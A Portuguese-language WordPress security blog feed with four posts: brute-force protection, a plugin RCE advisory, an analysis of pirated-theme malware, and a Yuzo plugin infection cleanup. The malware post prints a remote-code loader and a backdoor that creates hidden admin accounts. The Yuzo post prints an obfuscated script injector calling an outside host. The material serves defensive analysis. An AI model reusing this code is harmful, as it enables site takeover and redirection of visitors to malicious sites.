<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Arquivos wordpress - ETH SECURITY</title>
	<atom:link href="https://ethsecurity.com.br/tag/wordpress/feed/" rel="self" type="application/rss+xml" />
	<link>https://ethsecurity.com.br/tag/wordpress/</link>
	<description>Especialista em segurança de sites</description>
	<lastBuildDate>Tue, 20 Sep 2022 17:37:19 +0000</lastBuildDate>
	<language>pt-BR</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.3</generator>

<image>
	<url>https://ethsecurity.com.br/wp-content/uploads/2019/04/logo-150x150.jpg</url>
	<title>Arquivos wordpress - ETH SECURITY</title>
	<link>https://ethsecurity.com.br/tag/wordpress/</link>
	<width>32</width>
	<height>32</height>
</image> 
<site xmlns="com-wordpress:feed-additions:1">161029545</site>	<item>
		<title>Ataques de força bruta (bruteforce), como se proteger.</title>
		<link>https://ethsecurity.com.br/ataques-de-forca-bruta-bruteforce-como-se-proteger/</link>
					<comments>https://ethsecurity.com.br/ataques-de-forca-bruta-bruteforce-como-se-proteger/#respond</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Sat, 04 May 2019 10:52:50 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[Segurança wordpress]]></category>
		<category><![CDATA[Sem categoria]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=279</guid>

					<description><![CDATA[<p>Imagine que em suas mãos está um daqueles cadeados de segredo de 4 dígitos com os algarismos de 0 a 9, você precisa abrir aquele cadeado porém não sabe a combinação correta, então você começa a inserir números aleatórios na esperança de que o cadeado abra, o que vai ocorrer se o fabricante tiver inserido [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/ataques-de-forca-bruta-bruteforce-como-se-proteger/">Ataques de força bruta (bruteforce), como se proteger.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Imagine que em suas mãos está um daqueles cadeados de segredo de 4 dígitos com os algarismos de 0 a 9, você precisa abrir aquele cadeado porém não sabe a combinação correta, então você começa a inserir números aleatórios na esperança de que o cadeado abra, o que vai ocorrer se o fabricante tiver inserido uma sequência simples como 1234, ou 0000? como resultado o cadeado abrirá facilmente.</p>
<p>Agora imagine que você tem a capacidade de tentar várias combinações por segundo, assim como o Superman faria com sua incrível velocidade, ficaria fácil de descobrir o segredo, o mesmo se dá hoje com as senhas que você insere principalmente na área administrativa de seu site.</p>
<h3>Estatísticas:</h3>
<p>Uma empresa de segurança informou em um relatório as senhas mais utilizadas de 2018, e acreditem se quiser segue a lista das 25 primeiras:</p>
<ul style="color: #000000;">
<li>1. 123456</li>
<li>2. password</li>
<li>3. 123456789</li>
<li>4. 12345678</li>
<li>5. 12345</li>
<li>6. 111111</li>
<li>7. 1234567</li>
<li>8. sunshine</li>
<li>9. qwerty</li>
<li>10. iloveyou</li>
<li>11. princess</li>
<li>12. admin</li>
<li>13. welcome</li>
<li>14. 666666</li>
<li>15. abc123</li>
<li>16. football</li>
<li>17. 123123</li>
<li>18. monkey</li>
<li>19. 654321</li>
<li>20. !@#$%^&amp;*</li>
<li>21. charlie</li>
<li>22. aa123456</li>
<li>23. donald</li>
<li>24. password1</li>
<li>25. qwerty123</li>
</ul>
<p>Vemos no topo da lista a nossa campeã de todos os anos 123456, a qual não é preciso nem um ataque de bruteforce para ser quebrada.</p>
<h3>Como funciona o ataque:</h3>
<p>Primeiramente o que um hacker precisa saber é a URL administrativa de seu site, assim ocorre o primeiro erro dos administradores, não alterar o endereço padrão, no WordPress é wp-admin, no Joomla: administrator, Magento: admin e muitos que fazem sites com programação própria cometem o mesmo erro.</p>
<p>Não pensem que os atacantes fazem esse processo manualmente, existem muitos scanners de vulnerabilidade que possuem a função findadmin, que tenta várias URLs para encontrar o alvo, portanto, encontrar a área administrativa pode não ser uma tarefa difícil.</p>
<p>Encontrado o alvo do ataque vem a hora de adivinhar o usuário, outro grande erro dos administradores, que deixam os padrões como admin, master, administrator etc, inclusive no WordPress é possível encontrar o nome do administrador com uma técnica chamada de enumeração, assunto para os próximos capítulos desse blog.</p>
<p>Com essas informações em mãos o indivíduo pode começar um ataque com várias combinações de senhas, a fim de obter sucesso caso a senha utilizada seja de baixa complexidade.</p>
<p>Existem na internet wordlists com bilhões de senhas, um arquivo de texto pode conter até 5G de tamanho, isso os mais modestos.</p>
<h3>O que um ataque pode causar?</h3>
<p>Além da possibilidade de seu site ser invadido com essa técnica, são utilizados um grande número de recursos no ataque, fazendo com que seu site fique indisponível, o servidor fique offline ou com que o administrador deste bloqueie seu site a fim de preservar o uptime do host.</p>
<p>Mas, por que um bruteforce consome tantos recursos?</p>
<p>A fim de ilustrar, vamos fazer um login em um site WordPress utilizando a senha errada, veja o quanto de recursos de CPU consome somente a página de login:</p>
<p>&nbsp;</p>
<p><img fetchpriority="high" decoding="async" class="alignnone wp-image-288 size-full" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/05/cpu.jpg" alt="" width="764" height="129" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/05/cpu.jpg 764w, https://ethsecurity.com.br/wp-content/uploads/2019/05/cpu-150x25.jpg 150w, https://ethsecurity.com.br/wp-content/uploads/2019/05/cpu-300x51.jpg 300w, https://ethsecurity.com.br/wp-content/uploads/2019/05/cpu-700x118.jpg 700w" sizes="(max-width: 764px) 100vw, 764px" /></p>
<p>O processo funciona da seguinte maneira, as senhas ficam criptografadas no banco de dados, como não existe criptografia reversa para esse tipo de hash, o servidor precisa criptografar a senha digitada e comparar com o hash da senha no banco de dados com o intuito de validar a mesma. O hashda senha 123456 no WordPress fica no banco de dados dessa maneira:</p>
<p>$1$PIIEnrFJ$/VKH4QNrlTWr7tQCb9YkV0</p>
<p>O hash com somente um caractere alterado difere totalmente, mostrando a segurança desse tipo de criptografia:</p>
<p>12345:</p>
<p>$1$zNkKg4EY$CSks7WAfuICMFS70ZEPYn1</p>
<p>Esse processo de criptografia e comparação de hashs foi idealizado para executar poucas vezes, dessa forma não sobrecarregando o servidor, porém se não controlado, ataques de bruteforces podem realizar mai de 3 tentativas por segundo, tendo a indisponibilidade do site como resultado.</p>
<h3>O que você deve fazer?</h3>
<p>Para evitar os ataques de bruteforce você deve, primeiramente, ter uma senha forte, desse modo ela não será facilmente obtida através desse tipo de ataque.</p>
<p>Baseando-se no WordPress, o CMS mais utilizado no mundo, recomendamos primeiramente que altere a URL administrativa. Para isso pode-se utilizar vários plugins, como o rename wp-login.php.</p>
<p>Também altere o nome do usuário de admin para outro que você deseje, de difícil dedução, nas configurações do WordPress, em usuários é possível realizar essa ação:</p>
<p>&nbsp;</p>
<p><img decoding="async" class="size-medium wp-image-289 aligncenter" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/05/admin-300x200.jpg" alt="" width="300" height="200" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/05/admin-300x200.jpg 300w, https://ethsecurity.com.br/wp-content/uploads/2019/05/admin-150x100.jpg 150w, https://ethsecurity.com.br/wp-content/uploads/2019/05/admin.jpg 326w" sizes="(max-width: 300px) 100vw, 300px" /></p>
<p>&nbsp;</p>
<p>Por último e mais importante, adicione um captcha na área administrativa de seu site, essa é a maior arma contra ataques de bruteforce, pois caso ele não seja feito por quem tenta realizar o login o servidor nem irá realizar a comparação das senhas.</p>
<h1>Site infectado? Não consegue resolver?</h1>
<p>Entre em contato agora com nossa consultoria especializada através do link <a href="https://www.ethsecurity.com.br/remocao-de-malwares/">Remoção de Malware</a> em nosso site.</p>
<p>&nbsp;</p>
<p>O post <a href="https://ethsecurity.com.br/ataques-de-forca-bruta-bruteforce-como-se-proteger/">Ataques de força bruta (bruteforce), como se proteger.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/ataques-de-forca-bruta-bruteforce-como-se-proteger/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">279</post-id>	</item>
		<item>
		<title>Vulnerabilidades sendo exploradas no plugin Social Warfare</title>
		<link>https://ethsecurity.com.br/vulnerabilidades-no-plugin-social-warfare-sendo-explorada/</link>
					<comments>https://ethsecurity.com.br/vulnerabilidades-no-plugin-social-warfare-sendo-explorada/#respond</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Thu, 25 Apr 2019 03:49:16 +0000</pubDate>
				<category><![CDATA[Hacking]]></category>
		<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[Segurança wordpress]]></category>
		<category><![CDATA[plugin]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[segurança]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<category><![CDATA[virus de site]]></category>
		<category><![CDATA[vulnerabildiade de plugins]]></category>
		<category><![CDATA[vulnerabildiade wordpress]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=236</guid>

					<description><![CDATA[<p>Nos últimos dias vários sites WordPress que possuem o plugin Social Warfare estão sendo atacados devido uma vulnerabilidade de RCE (Remote code Execution ou Execução Remota de Código) presente na programação do plugin, a estimativa é de que são mais de 40.000 sites no mundo com essa falha. O problema está no arquivo social-warfare\lib\utilities\SWP_ Databa [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/vulnerabilidades-no-plugin-social-warfare-sendo-explorada/">Vulnerabilidades sendo exploradas no plugin Social Warfare</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Nos últimos dias vários sites WordPress que possuem o plugin Social Warfare estão sendo atacados devido uma vulnerabilidade de RCE (Remote code Execution ou Execução Remota de Código) presente na programação do plugin, a estimativa é de que são mais de 40.000 sites no mundo com essa falha.</p>
<p>O problema está no arquivo social-warfare\lib\utilities\SWP_ Databa se_Migration.php, dentro desse arquivo existe uma varável com o nome $_GET[‘swp_url’] com a função get_file_content do php, que permite a execução de códigos remotamente:</p>
<p><img decoding="async" class="alignnone wp-image-107 size-full" src="https://ethsecurity.com.br/wp-content/uploads/2019/04/Plugin-Vulnerability-574x270.jpg" alt="" width="574" height="270" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/04/Plugin-Vulnerability-574x270.jpg 574w, https://ethsecurity.com.br/wp-content/uploads/2019/04/Plugin-Vulnerability-574x270-300x141.jpg 300w" sizes="(max-width: 574px) 100vw, 574px" /></p>
<p>A grande falha aqui está na função is_admin() do wordpress que é utilizada incorretamente, que faz somente a checagem se a url solicitada faz parte da página de admin, não fazendo a validação se o administrador está logado.</p>
<h3>Fazendo o teste:</h3>
<p>Novamente usei o laboratório local para teste, colocando o exploit e payload em outra maquina para comprovar o acesso não autorizado, como o código permite execução de comandos dentro de arquivos, criei um arquivo txt com a função phpinfo(), segue o resultado:</p>
<p>&nbsp;</p>
<p>E se eu quiser o nome da base de dados e outras infromações importantes, basta o invasor usar a imaginação (isso eles tem de sobra), baixar conteúdo, visualizar a senha da base de dados e até inserir usuários no banco de dados, criando outro admin para o site.</p>
<h3>Não acaba por ai, temos uma vulnerabilidade de XSS de brinde:</h3>
<p>Além da falha citada acima, essa brecha abre caminho para inserir conteúdo no banco de dados com técnicas de Cross Site Scripting, assim como mostrei no <a href="https://www.ethsecurity.com.br/2019/04/19/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/">post do Yuzo Related Posts</a></p>
<p>Com a mesma url é utilizado um outro exploit e dessa vez podemos inserir conteúdo no banco de dados e redirecionar o site para domínios maliciosos, não vamos detalhar a vulnerabilidade pois seria um copiar e colar do post relacionado ao related posts.</p>
<h3>Solução:</h3>
<p>Atualize o plugin o mais rápido possível para a versão acima de 3.5.3 .</p>
<h1>Site infectado? Não consegue resolver?</h1>
<p>Entre em contato agora com nossa consultoria especializada através do link <a href="https://www.ethsecurity.com.br/remocao-de-malwares/">Remoção de Malware</a> em nosso site.</p>
<p>O post <a href="https://ethsecurity.com.br/vulnerabilidades-no-plugin-social-warfare-sendo-explorada/">Vulnerabilidades sendo exploradas no plugin Social Warfare</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/vulnerabilidades-no-plugin-social-warfare-sendo-explorada/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">236</post-id>	</item>
		<item>
		<title>Por que não utilizar temas e plugins piratas.</title>
		<link>https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/</link>
					<comments>https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/#respond</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Tue, 23 Apr 2019 12:36:32 +0000</pubDate>
				<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[plugin nulled]]></category>
		<category><![CDATA[plugin pirata]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[segurança]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<category><![CDATA[tema nulled]]></category>
		<category><![CDATA[tema pirata]]></category>
		<category><![CDATA[virus de site]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=209</guid>

					<description><![CDATA[<p>Infelizmente é muito comum hoje utilizar em CMS plugins e temas piratas, vários sites na internet disponibilizam esses materiais de maneira &#8220;gratuita&#8221;, porém o preço que cobram pode ser alto para seu conteúdo online, vamos a nossa análise. Realizamos o download de um tema pirata, fizemos a instalação em em ambiente controlado e após isso [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/">Por que não utilizar temas e plugins piratas.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Infelizmente é muito comum hoje utilizar em CMS plugins e temas piratas, vários sites na internet disponibilizam esses materiais de maneira &#8220;gratuita&#8221;, porém o preço que cobram pode ser alto para seu conteúdo online, vamos a nossa análise.</p>
<p>Realizamos o download de um tema pirata, fizemos a instalação em em ambiente controlado e após isso fizemos o nosso scan nos arquivos e encontramos códigos maliciosos injetados nos seguintes arquivos:</p>
<p>./wp-content/themes/twentynineteen/functions.php<br />
./wp-content/themes/twentyseventeen/functions.php<br />
./wp-content/themes/twentysixteen/functions.php<br />
./wp-includes/post.php<br />
./wp-includes/wp-tmp.php<br />
./wp-includes/wp-vcd.php</p>
<p>Começamos pelos arquivos functions.php e o conteúdo mostra que o mesmo é utilizado para infectar os demais:</p>
<p>elseif ($tmpcontent = @file_get_contents(&#8220;http://www. harors .pw/code .php&#8221;) AND stripos($tmpcontent, $wp_auth_key) !== false ) {</p>
<p>if (stripos($tmpcontent, $wp_auth_key) !== false) {<br />
extract(theme_temp_setup($tmpcontent));<br />
@file_put_contents(ABSPATH . &#8216;wp-includes/wp-tmp.php&#8217;, $tmpcontent);</p>
<p>if (!file_exists(ABSPATH . &#8216;wp-includes/wp-tmp.php&#8217;)) {<br />
@file_put_contents(get_template_directory() . &#8216;/wp-tmp.php&#8217;, $tmpcontent);<br />
if (!file_exists(get_template_directory() . &#8216;/wp-tmp.php&#8217;)) {<br />
@file_put_contents(&#8216;wp-tmp.php&#8217;, $tmpcontent);</p>
<p>verificando o conteúdo do arquivo wp-tmp.php o mesmo contém redirecionamentos para sites maliciosos:</p>
<p>&lt;script type=&#8221;text/javascript&#8221; src=&#8221;//deloplen .com/ apu.php?zoneid=2542869&#8243; async data-cfasync=&#8221;false&#8221;&gt;&lt;/script&gt;<br />
&lt;script src=&#8221;//pushqwer .com/ ntfc.php?p=2542872&#8243; data-cfasync=&#8221;false&#8221; async&gt;&lt;/script&gt;</p>
<p>Os links acima em seu site fará com que o mesmo seja marcado como malicioso no Google e outras ferramentas de pesquisa, ou seja, o site será marcado com a tela vermelha de alerta de conteúdo malicioso, imagine seu cliente acessando sua loja online e se deparando com o aviso &#8220;O site a seguir contém conteúdo malicioso ou enganoso&#8221;.</p>
<p>Em outras ocasiões o Google interrompe o AdSense e Adwords para aquele site, outro prejuízo para o proprietário do mesmo.</p>
<p>Analisando mais profundamente os scripts vimos que também foi criado o arquivo wp-includes/class-wp.php:</p>
<p>require $_SERVER[&#8216;DOCUMENT_ROOT&#8217;].&#8217;/wp-load.php&#8217;;<br />
$table_name = $wpdb-&gt;get_blog_prefix();<br />
$sample = &#8216;a:1:{s:13:&#8221;administrator&#8221;;b:1;}&#8217;;<br />
if( isset($_GET[&#8216;ok&#8217;]) ) { echo &#8216;&lt;!&#8211; Silence is golden. &#8211;&gt;&#8217;;}<br />
if( isset($_GET[&#8216;awu&#8217;]) ) {<br />
$wpdb-&gt;query(&#8220;INSERT INTO $wpdb-&gt;users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES (&#8216;100010010&#8217;, &#8216;100010010&#8217;, &#8216;\$P\$BaRp7gFRTND5AwwJwpQY8EyN3otDiL.&#8217;, &#8216;100010010&#8217;, &#8216;te@ea.st&#8217;, &#8221;, &#8216;2011-06-07 00:00:00&#8217;, &#8221;, &#8216;0&#8217;, &#8216;100010010&#8217;);&#8221;);<br />
$wpdb-&gt;query(&#8220;INSERT INTO $wpdb-&gt;usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (100010010, &#8216;100010010&#8217;, &#8216;{$table_name}capabilities&#8217;, &#8216;{$sample}&#8217;);&#8221;);<br />
$wpdb-&gt;query(&#8220;INSERT INTO $wpdb-&gt;usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, &#8216;100010010&#8217;, &#8216;{$table_name}user_level&#8217;, &#8217;10&#8217;);&#8221;); }<br />
if( isset($_GET[&#8216;dwu&#8217;]) ) { $wpdb-&gt;query(&#8220;DELETE FROM $wpdb-&gt;users WHERE `ID` = 100010010&#8221;);<br />
$wpdb-&gt;query(&#8220;DELETE FROM $wpdb-&gt;usermeta WHERE $wpdb-&gt;usermeta.`umeta_id` = 100010010&#8221;);}<br />
if( isset($_GET[&#8216;key&#8217;]) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo &#8216;&lt;center&gt;&lt;h2&gt;&#8217; . esc_attr( $options[&#8216;user_name&#8217;] . &#8216;:&#8217; . esc_attr( $options[&#8216;api_key&#8217;])) . &#8216;&lt;br&gt;&#8217;;<br />
echo esc_html( envato_market()-&gt;get_option( &#8216;token&#8217; ) ); echo &#8216;&lt;/center&gt;&lt;/h2&gt;&#8217;; }</p>
<p>Analisando o código chegamos a conclusão que se trata de um backdoor, veja o que o acontece ao acessar o arquivo pela url utilizando o final ?awu (add wordpress user):</p>
<p>| 100010010 | 100010010 | $P$BaRp7gFRTND5AwwJwpQY8EyN3otDiL. | 100010010 | te@ea.st | | 2011-06-07 00:00:00 | | 0 | 100010010 |</p>
<p>Conforme visto acima, foi adicionado um usuário WordPress com a propriedade de administrador na tabela wp_users no banco de dados, o que dará total controle do invasor ao site, depois de realizar as ações que quiser o usuário pode ser removido com o comando dwu (delete wordpress user) e podendo adicionar novamente quando desejar enquanto o arquivo estiver no site, ou seja, ele toamrá total controle do site sem que você saiba até um analista de segurança apurar os logs e descobrir essas ações ou o arquivo ser removido.</p>
<h3>Conclusão:</h3>
<p>Baixando plugins e temas piratas você estará inserindo um verdadeiro cavalo de Tróia em seu site, dando acesso a terceiros a todos os dados sensíveis, trazendo muito mais prejuízo do que adquirir um tema ou plugin de maneira lícita.</p>
<p>Além das vantagens de ter um site seguro, adquirindo um plugin ou tema pago de maneira correta você poderá contar com o suporte do desenvolvedor da aplicação em caso de problemas.</p>
<h1>Site infectado? Não consegue resolver?</h1>
<p>Entre em contato agora com nossa consultoria especializada através do link <a href="https://www.ethsecurity.com.br/remocao-de-malwares/">Remoção de Malware</a> em nosso site.</p>
<p>Dúvidas? Sugestões? Fiquem a vontade para se expressar nos comentários.</p>
<p>O post <a href="https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/">Por que não utilizar temas e plugins piratas.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/por-que-nao-utilizar-temas-e-plugins-piratas/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">209</post-id>	</item>
		<item>
		<title>[Vídeo] Ataques no Plugin Yuzo Related Posts, como remover a infecção</title>
		<link>https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/</link>
					<comments>https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/#comments</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Fri, 19 Apr 2019 12:06:24 +0000</pubDate>
				<category><![CDATA[remoção de malware]]></category>
		<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[Segurança wordpress]]></category>
		<category><![CDATA[plugin]]></category>
		<category><![CDATA[remoção de malwares]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[segurança]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[segurança wordpress]]></category>
		<category><![CDATA[virus de site]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=138</guid>

					<description><![CDATA[<p>Recentemente vários ataques estão sendo direcionados para o plugin Yuzo Related Posts, utilizado por cerca de 60.000 sites WordPress. A vulnerabilidade se assemelha ao Social Warfare e ao Yellow Pencil, as rotinas do plugin que fazem com que o mesmo salve configurações na base de dados carecem de uma autenticação de segurança, o que faz [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/">[Vídeo] Ataques no Plugin Yuzo Related Posts, como remover a infecção</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Recentemente vários ataques estão sendo direcionados para o plugin Yuzo Related Posts, utilizado por cerca de 60.000 sites WordPress. A vulnerabilidade se assemelha ao Social Warfare e ao Yellow Pencil, as rotinas do plugin que fazem com que o mesmo salve configurações na base de dados carecem de uma autenticação de segurança, o que faz que a falha seja explorada.</p>
<p><iframe loading="lazy" width="1200" height="675" src="https://www.youtube.com/embed/0iJeesXerGs?feature=oembed" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></p>
<h3>Infecção:</h3>
<p>Uma vez explorada o invasor insere um código malicioso como da imagem abaixo:</p>
<p><strong><code class="plain">&lt;script language=javascript&gt;</code></strong><strong><code class="functions">eval</code></strong><strong><code class="plain">(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));&lt;/script&gt;</code></strong></p>
<p>O código descriptografado fica dessa maneira:</p>
<p><strong>&lt;/style&gt;&lt;script language=javascript&gt;var elem = document.createElement(&#8216;script&#8217;);</strong></p>
<p><strong>elem.type = &#8216;text/javascript&#8217;;</strong></p>
<p><strong>elem.async = true; elem.src = &#8216;hxxps://hellofromhony[.]org/counter&#8217;;</strong></p>
<p><strong>document.getElementsByTagName(&#8216;head&#8217;)[0].appendChild(elem);&lt;/script&gt;</strong></p>
<p>Assim quando o site é acessado o usuário e redirecionado para sites maliciosos.</p>
<p><!-- LOMADEE - BEGIN --><br />
<script src="//ad.lomadee.com/banners/script.js?sourceId=36131687&#038;dimension=9&#038;height=350&#038;width=350&#038;method=0" type="text/javascript" language="javascript"></script><br />
<!-- LOMADEE - END --></p>
<h3>Removendo a infecção:</h3>
<p>Primeiramente faça um backup de sua base de dados, pois caso dê algo errado você terá uma cópia de segurança.</p>
<p>Acesse seu PhpMyAdmin ou o gerenciador de banco de dados de sua preferência e clique na base de dados e em pesquisar, adicione a string &#8220;String.fromCharCode(118&#8221; ,sem aspas, no campo de pesquisa e clique em selecionar todas as tabelas e cliquem em executar no canto a direita:</p>
<p><img loading="lazy" decoding="async" class="size-medium wp-image-161 aligncenter" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/04/how-to-300x240.png" alt="" width="300" height="240" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/04/how-to-300x240.png 300w, https://ethsecurity.com.br/wp-content/uploads/2019/04/how-to.png 631w" sizes="auto, (max-width: 300px) 100vw, 300px" /></p>
<p>Após isso você verá que o conteúdo foi encontrado na tabela wp_options:</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-162" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/04/how-to-2-300x240.png" alt="" width="328" height="262" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/04/how-to-2-300x240.png 300w, https://ethsecurity.com.br/wp-content/uploads/2019/04/how-to-2.png 631w" sizes="auto, (max-width: 328px) 100vw, 328px" /></p>
<p>Copie todo o conteúdo para um bloco de notas e remova exatamente o conteúdo que foi citado acima e substitua na tabela citada pelo conteúdo sem a infecção.</p>
<p>&nbsp;</p>
<h3>Contra medida:</h3>
<p>&nbsp;</p>
